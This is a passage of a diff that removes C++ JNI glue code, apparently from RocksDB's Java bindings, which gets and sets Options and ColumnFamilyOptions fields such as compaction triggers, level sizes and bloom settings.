-jint Java_org_rocksdb_Options_numLevels(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->num_levels;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setNumLevels
- * Signature: (JI)V
- */
-void Java_org_rocksdb_Options_setNumLevels(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint jnum_levels) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->num_levels =
-      static_cast<int>(jnum_levels);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    levelZeroFileNumCompactionTrigger
- * Signature: (J)I
- */
-jint Java_org_rocksdb_Options_levelZeroFileNumCompactionTrigger(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(
-      jhandle)->level0_file_num_compaction_trigger;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setLevelZeroFileNumCompactionTrigger
- * Signature: (JI)V
- */
-void Java_org_rocksdb_Options_setLevelZeroFileNumCompactionTrigger(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jint jlevel0_file_num_compaction_trigger) {
-  reinterpret_cast<rocksdb::Options*>(
-      jhandle)->level0_file_num_compaction_trigger =
-          static_cast<int>(jlevel0_file_num_compaction_trigger);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    levelZeroSlowdownWritesTrigger
- * Signature: (J)I
- */
-jint Java_org_rocksdb_Options_levelZeroSlowdownWritesTrigger(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(
-      jhandle)->level0_slowdown_writes_trigger;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setLevelSlowdownWritesTrigger
- * Signature: (JI)V
- */
-void Java_org_rocksdb_Options_setLevelZeroSlowdownWritesTrigger(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jint jlevel0_slowdown_writes_trigger) {
-  reinterpret_cast<rocksdb::Options*>(
-      jhandle)->level0_slowdown_writes_trigger =
-          static_cast<int>(jlevel0_slowdown_writes_trigger);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    levelZeroStopWritesTrigger
- * Signature: (J)I
- */
-jint Java_org_rocksdb_Options_levelZeroStopWritesTrigger(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(
-      jhandle)->level0_stop_writes_trigger;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setLevelStopWritesTrigger
- * Signature: (JI)V
- */
-void Java_org_rocksdb_Options_setLevelZeroStopWritesTrigger(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jint jlevel0_stop_writes_trigger) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->level0_stop_writes_trigger =
-      static_cast<int>(jlevel0_stop_writes_trigger);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    targetFileSizeBase
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_targetFileSizeBase(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->target_file_size_base;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setTargetFileSizeBase
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setTargetFileSizeBase(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong jtarget_file_size_base) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->target_file_size_base =
-      static_cast<uint64_t>(jtarget_file_size_base);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    targetFileSizeMultiplier
- * Signature: (J)I
- */
-jint Java_org_rocksdb_Options_targetFileSizeMultiplier(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(
-      jhandle)->target_file_size_multiplier;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setTargetFileSizeMultiplier
- * Signature: (JI)V
- */
-void Java_org_rocksdb_Options_setTargetFileSizeMultiplier(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jint jtarget_file_size_multiplier) {
-  reinterpret_cast<rocksdb::Options*>(
-      jhandle)->target_file_size_multiplier =
-          static_cast<int>(jtarget_file_size_multiplier);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    maxBytesForLevelBase
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_maxBytesForLevelBase(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(
-      jhandle)->max_bytes_for_level_base;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setMaxBytesForLevelBase
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setMaxBytesForLevelBase(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong jmax_bytes_for_level_base) {
-  reinterpret_cast<rocksdb::Options*>(
-      jhandle)->max_bytes_for_level_base =
-          static_cast<int64_t>(jmax_bytes_for_level_base);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    levelCompactionDynamicLevelBytes
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_levelCompactionDynamicLevelBytes(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(
-      jhandle)->level_compaction_dynamic_level_bytes;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setLevelCompactionDynamicLevelBytes
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setLevelCompactionDynamicLevelBytes(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jboolean jenable_dynamic_level_bytes) {
-  reinterpret_cast<rocksdb::Options*>(
-      jhandle)->level_compaction_dynamic_level_bytes =
-          (jenable_dynamic_level_bytes);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    maxBytesForLevelMultiplier
- * Signature: (J)D
- */
-jdouble Java_org_rocksdb_Options_maxBytesForLevelMultiplier(JNIEnv* env,
-                                                            jobject jobj,
-                                                            jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(
-      jhandle)->max_bytes_for_level_multiplier;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setMaxBytesForLevelMultiplier
- * Signature: (JD)V
- */
-void Java_org_rocksdb_Options_setMaxBytesForLevelMultiplier(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jdouble jmax_bytes_for_level_multiplier) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->max_bytes_for_level_multiplier =
-      static_cast<double>(jmax_bytes_for_level_multiplier);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    maxCompactionBytes
- * Signature: (J)I
- */
-jlong Java_org_rocksdb_Options_maxCompactionBytes(JNIEnv* env, jobject jobj,
-                                                  jlong jhandle) {
-  return static_cast<jlong>(
-      reinterpret_cast<rocksdb::Options*>(jhandle)->max_compaction_bytes);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setMaxCompactionBytes
- * Signature: (JI)V
- */
-void Java_org_rocksdb_Options_setMaxCompactionBytes(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jmax_compaction_bytes) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->max_compaction_bytes =
-      static_cast<uint64_t>(jmax_compaction_bytes);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    arenaBlockSize
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_arenaBlockSize(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->arena_block_size;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setArenaBlockSize
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setArenaBlockSize(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jarena_block_size) {
-  rocksdb::Status s = rocksdb::check_if_jlong_fits_size_t(jarena_block_size);
-  if (s.ok()) {
-    reinterpret_cast<rocksdb::Options*>(jhandle)->arena_block_size =
-        jarena_block_size;
-  } else {
-    rocksdb::IllegalArgumentExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    disableAutoCompactions
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_disableAutoCompactions(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(
-      jhandle)->disable_auto_compactions;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setDisableAutoCompactions
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setDisableAutoCompactions(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jboolean jdisable_auto_compactions) {
-  reinterpret_cast<rocksdb::Options*>(
-      jhandle)->disable_auto_compactions =
-          static_cast<bool>(jdisable_auto_compactions);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    maxSequentialSkipInIterations
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_maxSequentialSkipInIterations(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(
-      jhandle)->max_sequential_skip_in_iterations;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setMaxSequentialSkipInIterations
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setMaxSequentialSkipInIterations(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong jmax_sequential_skip_in_iterations) {
-  reinterpret_cast<rocksdb::Options*>(
-      jhandle)->max_sequential_skip_in_iterations =
-          static_cast<int64_t>(jmax_sequential_skip_in_iterations);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    inplaceUpdateSupport
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_inplaceUpdateSupport(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(
-      jhandle)->inplace_update_support;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setInplaceUpdateSupport
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setInplaceUpdateSupport(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jboolean jinplace_update_support) {
-  reinterpret_cast<rocksdb::Options*>(
-      jhandle)->inplace_update_support =
-          static_cast<bool>(jinplace_update_support);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    inplaceUpdateNumLocks
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_inplaceUpdateNumLocks(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(
-      jhandle)->inplace_update_num_locks;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setInplaceUpdateNumLocks
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setInplaceUpdateNumLocks(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong jinplace_update_num_locks) {
-  rocksdb::Status s = rocksdb::check_if_jlong_fits_size_t(
-      jinplace_update_num_locks);
-  if (s.ok()) {
-    reinterpret_cast<rocksdb::Options*>(jhandle)->inplace_update_num_locks =
-        jinplace_update_num_locks;
-  } else {
-    rocksdb::IllegalArgumentExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    memtablePrefixBloomSizeRatio
- * Signature: (J)I
- */
-jdouble Java_org_rocksdb_Options_memtablePrefixBloomSizeRatio(JNIEnv* env,
-                                                              jobject jobj,
-                                                              jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)
-      ->memtable_prefix_bloom_size_ratio;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setMemtablePrefixBloomSizeRatio
- * Signature: (JI)V
- */
-void Java_org_rocksdb_Options_setMemtablePrefixBloomSizeRatio(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jdouble jmemtable_prefix_bloom_size_ratio) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)
-      ->memtable_prefix_bloom_size_ratio =
-      static_cast<double>(jmemtable_prefix_bloom_size_ratio);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    bloomLocality
- * Signature: (J)I
- */
-jint Java_org_rocksdb_Options_bloomLocality(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->bloom_locality;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setBloomLocality
- * Signature: (JI)V
- */
-void Java_org_rocksdb_Options_setBloomLocality(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint jbloom_locality) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->bloom_locality =
-      static_cast<int32_t>(jbloom_locality);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    maxSuccessiveMerges
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_maxSuccessiveMerges(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->max_successive_merges;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setMaxSuccessiveMerges
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setMaxSuccessiveMerges(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong jmax_successive_merges) {
-  rocksdb::Status s = rocksdb::check_if_jlong_fits_size_t(
-      jmax_successive_merges);
-  if (s.ok()) {
-    reinterpret_cast<rocksdb::Options*>(jhandle)->max_successive_merges =
-        jmax_successive_merges;
-  } else {
-    rocksdb::IllegalArgumentExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    optimizeFiltersForHits
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_optimizeFiltersForHits(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(
-      jhandle)->optimize_filters_for_hits;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setOptimizeFiltersForHits
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setOptimizeFiltersForHits(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jboolean joptimize_filters_for_hits) {
-  reinterpret_cast<rocksdb::Options*>(
-      jhandle)->optimize_filters_for_hits =
-          static_cast<bool>(joptimize_filters_for_hits);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    optimizeForSmallDb
- * Signature: (J)V
- */
-void Java_org_rocksdb_Options_optimizeForSmallDb(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->OptimizeForSmallDb();
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    optimizeForPointLookup
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_optimizeForPointLookup(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong block_cache_size_mb) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->
-      OptimizeForPointLookup(block_cache_size_mb);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    optimizeLevelStyleCompaction
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_optimizeLevelStyleCompaction(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong memtable_memory_budget) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->
-      OptimizeLevelStyleCompaction(memtable_memory_budget);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    optimizeUniversalStyleCompaction
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_optimizeUniversalStyleCompaction(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong memtable_memory_budget) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->
-      OptimizeUniversalStyleCompaction(memtable_memory_budget);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    prepareForBulkLoad
- * Signature: (J)V
- */
-void Java_org_rocksdb_Options_prepareForBulkLoad(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->
-      PrepareForBulkLoad();
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    memtableHugePageSize
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_memtableHugePageSize(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(
-      jhandle)->memtable_huge_page_size;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setMemtableHugePageSize
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setMemtableHugePageSize(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong jmemtable_huge_page_size) {
-  rocksdb::Status s = rocksdb::check_if_jlong_fits_size_t(
-      jmemtable_huge_page_size);
-  if (s.ok()) {
-    reinterpret_cast<rocksdb::Options*>(
-        jhandle)->memtable_huge_page_size =
-            jmemtable_huge_page_size;
-  } else {
-    rocksdb::IllegalArgumentExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    softPendingCompactionBytesLimit
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_softPendingCompactionBytesLimit(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(
-      jhandle)->soft_pending_compaction_bytes_limit;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setSoftPendingCompactionBytesLimit
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setSoftPendingCompactionBytesLimit(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jsoft_pending_compaction_bytes_limit) {
-  reinterpret_cast<rocksdb::Options*>(
-      jhandle)->soft_pending_compaction_bytes_limit =
-          static_cast<int64_t>(jsoft_pending_compaction_bytes_limit);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    softHardCompactionBytesLimit
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_hardPendingCompactionBytesLimit(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(
-      jhandle)->hard_pending_compaction_bytes_limit;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setHardPendingCompactionBytesLimit
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setHardPendingCompactionBytesLimit(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jhard_pending_compaction_bytes_limit) {
-  reinterpret_cast<rocksdb::Options*>(
-      jhandle)->hard_pending_compaction_bytes_limit =
-          static_cast<int64_t>(jhard_pending_compaction_bytes_limit);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    level0FileNumCompactionTrigger
- * Signature: (J)I
- */
-jint Java_org_rocksdb_Options_level0FileNumCompactionTrigger(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(
-    jhandle)->level0_file_num_compaction_trigger;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setLevel0FileNumCompactionTrigger
- * Signature: (JI)V
- */
-void Java_org_rocksdb_Options_setLevel0FileNumCompactionTrigger(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jint jlevel0_file_num_compaction_trigger) {
-  reinterpret_cast<rocksdb::Options*>(
-      jhandle)->level0_file_num_compaction_trigger =
-          static_cast<int32_t>(jlevel0_file_num_compaction_trigger);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    level0SlowdownWritesTrigger
- * Signature: (J)I
- */
-jint Java_org_rocksdb_Options_level0SlowdownWritesTrigger(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(
-    jhandle)->level0_slowdown_writes_trigger;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setLevel0SlowdownWritesTrigger
- * Signature: (JI)V
- */
-void Java_org_rocksdb_Options_setLevel0SlowdownWritesTrigger(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jint jlevel0_slowdown_writes_trigger) {
-  reinterpret_cast<rocksdb::Options*>(
-      jhandle)->level0_slowdown_writes_trigger =
-          static_cast<int32_t>(jlevel0_slowdown_writes_trigger);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    level0StopWritesTrigger
- * Signature: (J)I
- */
-jint Java_org_rocksdb_Options_level0StopWritesTrigger(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(
-    jhandle)->level0_stop_writes_trigger;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setLevel0StopWritesTrigger
- * Signature: (JI)V
- */
-void Java_org_rocksdb_Options_setLevel0StopWritesTrigger(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jint jlevel0_stop_writes_trigger) {
-  reinterpret_cast<rocksdb::Options*>(
-      jhandle)->level0_stop_writes_trigger =
-          static_cast<int32_t>(jlevel0_stop_writes_trigger);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    maxBytesForLevelMultiplierAdditional
- * Signature: (J)[I
- */
-jintArray Java_org_rocksdb_Options_maxBytesForLevelMultiplierAdditional(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto mbflma =
-      reinterpret_cast<rocksdb::Options*>(jhandle)->
-          max_bytes_for_level_multiplier_additional;
-
-  const size_t size = mbflma.size();
-
-  jint* additionals = new jint[size];
-  for (size_t i = 0; i < size; i++) {
-    additionals[i] = static_cast<jint>(mbflma[i]);
-  }
-
-  jsize jlen = static_cast<jsize>(size);
-  jintArray result = env->NewIntArray(jlen);
-  if(result == nullptr) {
-      // exception thrown: OutOfMemoryError
-      delete [] additionals;
-      return nullptr;
-  }
-
-  env->SetIntArrayRegion(result, 0, jlen, additionals);
-  if(env->ExceptionCheck()) {
-      // exception thrown: ArrayIndexOutOfBoundsException
-      env->DeleteLocalRef(result);
-      delete [] additionals;
-      return nullptr;
-  }
-
-  delete [] additionals;
-
-  return result;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setMaxBytesForLevelMultiplierAdditional
- * Signature: (J[I)V
- */
-void Java_org_rocksdb_Options_setMaxBytesForLevelMultiplierAdditional(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jintArray jmax_bytes_for_level_multiplier_additional) {
-  jsize len = env->GetArrayLength(jmax_bytes_for_level_multiplier_additional);
-  jint *additionals =
-      env->GetIntArrayElements(jmax_bytes_for_level_multiplier_additional, nullptr);
-  if(additionals == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  opt->max_bytes_for_level_multiplier_additional.clear();
-  for (jsize i = 0; i < len; i++) {
-    opt->max_bytes_for_level_multiplier_additional.push_back(static_cast<int32_t>(additionals[i]));
-  }
-
-  env->ReleaseIntArrayElements(jmax_bytes_for_level_multiplier_additional,
-      additionals, JNI_ABORT);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    paranoidFileChecks
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_paranoidFileChecks(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(
-      jhandle)->paranoid_file_checks;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setParanoidFileChecks
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setParanoidFileChecks(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean jparanoid_file_checks) {
-  reinterpret_cast<rocksdb::Options*>(
-      jhandle)->paranoid_file_checks =
-          static_cast<bool>(jparanoid_file_checks);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setCompactionPriority
- * Signature: (JB)V
- */
-void Java_org_rocksdb_Options_setCompactionPriority(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jbyte jcompaction_priority_value) {
-  auto* opts = reinterpret_cast<rocksdb::Options*>(jhandle);
-  opts->compaction_pri =
-      rocksdb::CompactionPriorityJni::toCppCompactionPriority(jcompaction_priority_value);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    compactionPriority
- * Signature: (J)B
- */
-jbyte Java_org_rocksdb_Options_compactionPriority(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opts = reinterpret_cast<rocksdb::Options*>(jhandle);
-  return rocksdb::CompactionPriorityJni::toJavaCompactionPriority(
-      opts->compaction_pri);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setReportBgIoStats
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setReportBgIoStats(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean jreport_bg_io_stats) {
-  auto* opts = reinterpret_cast<rocksdb::Options*>(jhandle);
-  opts->report_bg_io_stats = static_cast<bool>(jreport_bg_io_stats);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    reportBgIoStats
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_reportBgIoStats(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opts = reinterpret_cast<rocksdb::Options*>(jhandle);
-  return static_cast<bool>(opts->report_bg_io_stats);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setCompactionOptionsUniversal
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setCompactionOptionsUniversal(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong jcompaction_options_universal_handle) {
-  auto* opts = reinterpret_cast<rocksdb::Options*>(jhandle);
-  auto* opts_uni =
-      reinterpret_cast<rocksdb::CompactionOptionsUniversal*>(
-          jcompaction_options_universal_handle);
-  opts->compaction_options_universal = *opts_uni;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setCompactionOptionsFIFO
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setCompactionOptionsFIFO(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jcompaction_options_fifo_handle) {
-  auto* opts = reinterpret_cast<rocksdb::Options*>(jhandle);
-  auto* opts_fifo =
-      reinterpret_cast<rocksdb::CompactionOptionsFIFO*>(
-          jcompaction_options_fifo_handle);
-  opts->compaction_options_fifo = *opts_fifo;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setForceConsistencyChecks
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setForceConsistencyChecks(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jboolean jforce_consistency_checks) {
-  auto* opts = reinterpret_cast<rocksdb::Options*>(jhandle);
-  opts->force_consistency_checks = static_cast<bool>(jforce_consistency_checks);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    forceConsistencyChecks
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_forceConsistencyChecks(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opts = reinterpret_cast<rocksdb::Options*>(jhandle);
-  return static_cast<bool>(opts->force_consistency_checks);
-}
-
-//////////////////////////////////////////////////////////////////////////////
-// rocksdb::ColumnFamilyOptions
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    newColumnFamilyOptions
- * Signature: ()J
- */
-jlong Java_org_rocksdb_ColumnFamilyOptions_newColumnFamilyOptions(
-    JNIEnv* env, jclass jcls) {
-  auto* op = new rocksdb::ColumnFamilyOptions();
-  return reinterpret_cast<jlong>(op);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    getColumnFamilyOptionsFromProps
- * Signature: (Ljava/util/String;)J
- */
-jlong Java_org_rocksdb_ColumnFamilyOptions_getColumnFamilyOptionsFromProps(
-    JNIEnv* env, jclass jclazz, jstring jopt_string) {
-  const char* opt_string = env->GetStringUTFChars(jopt_string, nullptr);
-  if(opt_string == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return 0;
-  }
-
-  auto* cf_options = new rocksdb::ColumnFamilyOptions();
-  rocksdb::Status status = rocksdb::GetColumnFamilyOptionsFromString(
-      rocksdb::ColumnFamilyOptions(), opt_string, cf_options);
-
-  env->ReleaseStringUTFChars(jopt_string, opt_string);
-
-  // Check if ColumnFamilyOptions creation was possible.
-  jlong ret_value = 0;
-  if (status.ok()) {
-    ret_value = reinterpret_cast<jlong>(cf_options);
-  } else {
-    // if operation failed the ColumnFamilyOptions need to be deleted
-    // again to prevent a memory leak.
-    delete cf_options;
-  }
-  return ret_value;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_disposeInternal(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  auto* cfo = reinterpret_cast<rocksdb::ColumnFamilyOptions*>(handle);
-  assert(cfo != nullptr);
-  delete cfo;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    optimizeForSmallDb
- * Signature: (J)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_optimizeForSmallDb(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->
-      OptimizeForSmallDb();
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    optimizeForPointLookup
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_optimizeForPointLookup(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong block_cache_size_mb) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->
-      OptimizeForPointLookup(block_cache_size_mb);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
